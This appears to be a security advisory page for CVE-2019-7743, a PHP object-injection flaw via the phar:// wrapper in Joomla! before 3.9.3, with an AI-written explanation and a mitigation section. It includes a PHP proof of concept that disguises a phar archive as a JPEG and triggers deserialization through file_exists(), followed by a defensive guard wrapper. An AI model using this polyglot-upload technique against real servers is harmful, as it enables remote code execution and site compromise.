VYPR

Critical severity · OSV Advisory · Published Feb 12, 2019 · Updated Aug 4, 2024

CVE-2019-7743

Description

An issue was discovered in Joomla! before 3.9.3. The phar:// stream wrapper can be used for object injection attacks because there is no protection mechanism (such as the TYPO3 PHAR stream wrapper) to prevent use of the phar:// handler for non-.phar files.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Joomla! CMS versions 2.5.0 through 3.9.2 allow PHP object injection via the phar:// stream wrapper because nothing stops the wrapper from opening files that do not carry a .phar extension.

Vulnerability

Joomla! CMS versions 2.5.0 through 3.9.2 do not restrict the phar:// stream wrapper to files that carry a .phar extension [1][3][4]. PHP (before 8.0) unserializes the metadata stored in a phar manifest as soon as any filesystem function opens a phar:// path, so an attacker who can place a phar archive on the server under an innocuous name (an uploaded image, for instance) and steer a phar:// URI for it into such a function obtains PHP object injection without the application ever calling unserialize(). The vulnerability exists because the CMS lacks a protection mechanism similar to the TYPO3 PHAR stream wrapper, which refuses phar:// access to any archive not named .phar [4].

Exploitation

An attacker needs either the ability to upload a file that contains a phar manifest with serialized metadata, or control over a file path that reaches a PHP filesystem function through the phar:// wrapper [1][4]. The upload is the common vector: PHP locates the phar format by its __HALT_COMPILER(); stub rather than by the file extension, so a valid phar archive can be stored under an image name and still pass a naive extension or magic-byte check. The attacker then supplies a phar://<path-to-upload>/<anything> URI wherever a filename is accepted; the first filesystem call on it (file_exists(), is_file(), file_get_contents() and similar) parses the manifest and unserializes the metadata, with no call to unserialize() anywhere in the application. No authentication is required if the vulnerable code path is reachable from the frontend; some attack vectors may require a low-privileged user. No race condition or user interaction is needed beyond the initial file upload [1][4].
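The primitive described in the Vulnerability and Exploitation sections, as an added example that is not Joomla! code and not taken from the advisory's references: it builds a phar archive whose manifest metadata holds a serialized object, stores it under an image name, and shows that a plain file_exists() on a phar:// path is enough to run the object's __wakeup(). The Gadget class, the file names and the JPEG-prefixed stub are constructed for the demo; in a real attack the gadget is a class the target already loads. Observed behaviour is that of PHP 7.x; PHP 8.0 and later defer metadata unserialization until Phar::getMetadata() is called, so the __wakeup line does not appear there.

```php
<?php
// Added example (not Joomla's code): the phar:// metadata deserialization
// primitive behind CVE-2019-7743, built and triggered locally.
// Run with:  php -d phar.readonly=0 phar_poc.php
// phar.readonly defaults to 1, which only blocks *writing* archives; the
// trigger at the bottom works with the default setting.

// Hypothetical gadget class. A real chain rides on a class the application
// loads anyway (Joomla core or a bundled library) whose magic method does
// something useful to the attacker; this one only announces itself.
class Gadget
{
    public $note = 'deserialized from phar metadata';

    public function __wakeup()
    {
        echo "[Gadget::__wakeup] {$this->note}\n";
    }
}

$archive   = __DIR__ . '/payload.phar';   // Phar needs a .phar name while writing
$disguised = __DIR__ . '/avatar.jpg';     // the name the "image" is uploaded under

@unlink($archive);
$phar = new Phar($archive);
$phar->startBuffering();
// Polyglot stub: JPEG marker bytes ahead of the PHP stub satisfy naive
// magic-byte checks; phar only needs __HALT_COMPILER(); somewhere in the stub.
$phar->setStub("\xFF\xD8\xFF\xE0" . '<?php __HALT_COMPILER(); ?>');
$phar->addFromString('x.txt', 'x');
$phar->setMetadata(new Gadget());         // serialized into the phar manifest
$phar->stopBuffering();
rename($archive, $disguised);             // the extension is irrelevant to phar://

// The trigger: any filesystem call on an attacker-influenced path is enough.
// Nothing below calls unserialize(); parsing the manifest does it.
$userSupplied = 'phar://' . $disguised . '/x.txt';
var_dump(file_exists($userSupplied));     // __wakeup output precedes bool(true)
```

The same trigger works with is_file(), filesize(), file_get_contents(), copy() and any other function that resolves a path through the stream layer, which is why the fix had to sit in the wrapper rather than in one call site.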

Impact

Successful exploitation hands attacker-controlled objects to the PHP deserializer; with a suitable gadget chain among the classes Joomla! loads, that becomes arbitrary PHP code execution on the server and full compromise of the installation [1][4]. The impact is high: confidentiality, integrity, and availability can all be affected. The attacker gains the ability to read, modify, or delete files, execute commands, and potentially pivot to other systems [1][4].

Mitigation

The vulnerability is fixed in Joomla! CMS version 3.9.3, released on 2019-02-12 [4]; affected sites should upgrade immediately. The fix registers the TYPO3 PHAR stream wrapper in place of PHP's native one, so phar:// access is refused globally unless the underlying archive file carries a .phar extension [4]. No workarounds are provided for versions prior to 3.9.3. The fix closes the phar:// entry point in Joomla!; the automatic unserialization of phar metadata is PHP behaviour (changed only in PHP 8.0), so other PHP code on the same host that passes attacker-influenced paths to filesystem functions remains exposed to the same class of bug. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date [1][4].
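The protection mechanism the fix adopts, as an added example that is neither Joomla's nor TYPO3's code: a minimal phar:// guard in the spirit of the TYPO3 PharStreamWrapper. It replaces PHP's built-in phar wrapper with a class that resolves the on-disk archive behind a phar:// URL, refuses anything whose base file is not named .phar, and otherwise hands the call to the native wrapper. Only the stream operations needed to serve file_exists() and file_get_contents() are implemented (assumption: enough for the demo; a production guard covers the full streamWrapper interface, including directory and write operations). The class name, file names and error text are constructed for the example.

```php
<?php
// Added example (not Joomla's or TYPO3's code): reject phar:// access to
// archives that are not named *.phar, before PHP parses their manifest.

final class PharExtensionGuard
{
    public $context;          // set by PHP for every wrapper instance
    private $stream;

    /** Resolve "phar://<archive>/<inner path>" to the archive file on disk. */
    public static function baseFile($url)
    {
        $path = substr($url, strlen('phar://'));
        $candidate = '';
        foreach (explode('/', $path) as $segment) {
            $candidate .= ($candidate === '' ? '' : '/') . $segment;
            if (is_file($candidate)) {     // plain path: never re-enters phar://
                return $candidate;
            }
        }
        return null;                       // assumption: POSIX path separators
    }

    /** Fail closed: unresolvable archives and non-.phar names are refused. */
    public static function assertAllowed($url)
    {
        $base = self::baseFile($url);
        if ($base === null || strtolower(pathinfo($base, PATHINFO_EXTENSION)) !== 'phar') {
            throw new RuntimeException("phar:// access denied for $url");
        }
    }

    /** Run $fn with PHP's built-in phar wrapper temporarily restored. */
    private static function withNativeWrapper(callable $fn)
    {
        stream_wrapper_restore('phar');
        try {
            return $fn();
        } finally {
            stream_wrapper_unregister('phar');
            stream_wrapper_register('phar', self::class);
        }
    }

    public static function install()
    {
        stream_wrapper_unregister('phar');
        stream_wrapper_register('phar', self::class);
    }

    // file_exists(), is_file(), stat() and friends land here.
    public function url_stat($url, $flags)
    {
        self::assertAllowed($url);
        return self::withNativeWrapper(function () use ($url) { return @stat($url); });
    }

    // fopen()/file_get_contents() land here; reads go through the native handle.
    public function stream_open($url, $mode, $options, &$opened)
    {
        self::assertAllowed($url);
        $this->stream = self::withNativeWrapper(function () use ($url, $mode) { return @fopen($url, $mode); });
        return $this->stream !== false;
    }

    public function stream_read($count) { return fread($this->stream, $count); }
    public function stream_eof()        { return feof($this->stream); }
    public function stream_stat()       { return fstat($this->stream); }
    public function stream_close()      { fclose($this->stream); }
}

// Demo with constructed inputs (creating tool.phar needs phar.readonly=0).
$legit = __DIR__ . '/tool.phar';
if (!is_file($legit)) {
    $p = new Phar($legit);
    $p->addFromString('x.txt', 'legit');   // flushed to disk with a default stub
}
PharExtensionGuard::install();

foreach ([$legit, __DIR__ . '/avatar.jpg'] as $file) {
    $url = 'phar://' . $file . '/x.txt';
    try {
        var_dump(file_exists($url));       // tool.phar: bool(true)
    } catch (RuntimeException $e) {
        echo $e->getMessage(), "\n";       // avatar.jpg: refused before any parse
    }
}
```

The extension check is the cheap half of the defence: the TYPO3 package also offers a metadata interceptor that parses the manifest and rejects archives whose metadata contains serialized objects, which matters on hosts that must accept genuine .phar uploads. On PHP 8.0 and later the wrapper no longer unserializes metadata on open, but the guard is still worthwhile for the code paths that call getMetadata() explicitly.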

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                        Affected versions    Patched versions
joomla/joomla-cms (Packagist)  >= 2.5.0, < 3.9.3    3.9.3

Affected products: 3

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 6

News mentions: 0 (no linked articles in our index yet)